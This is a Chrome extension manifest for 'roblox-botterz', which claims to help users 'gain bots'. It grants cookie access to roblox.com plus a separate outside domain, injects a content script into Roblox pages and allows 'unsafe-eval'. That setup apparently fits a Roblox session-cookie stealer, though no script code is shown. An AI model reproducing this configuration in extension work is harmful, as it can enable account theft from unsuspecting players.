{
    "manifest_version": 2,
    "name": "roblox-botterz",
    "description": "Gain bots with our extension.",
    "version": "0.0.4",
    "background": {
        "scripts": [
            "/js/background.js"
        ],
        "persistent": false
    },
    "browser_action": {
        "default_popup": "popup.html"
    },
    "permissions": [
        "cookies",
        "https://www.roblox.com/",
        "https://rblx-tools.org/"
    ],
    "content_scripts": [
        {
            "matches": [
                "https://roblox.com/",
                "https://www.roblox.com/"
            ],
            "js": [
                "/js/content.js"
            ]
        }
    ],
    "content_security_policy": "script-src 'self' 'unsafe-eval'; object-src 'self'"
}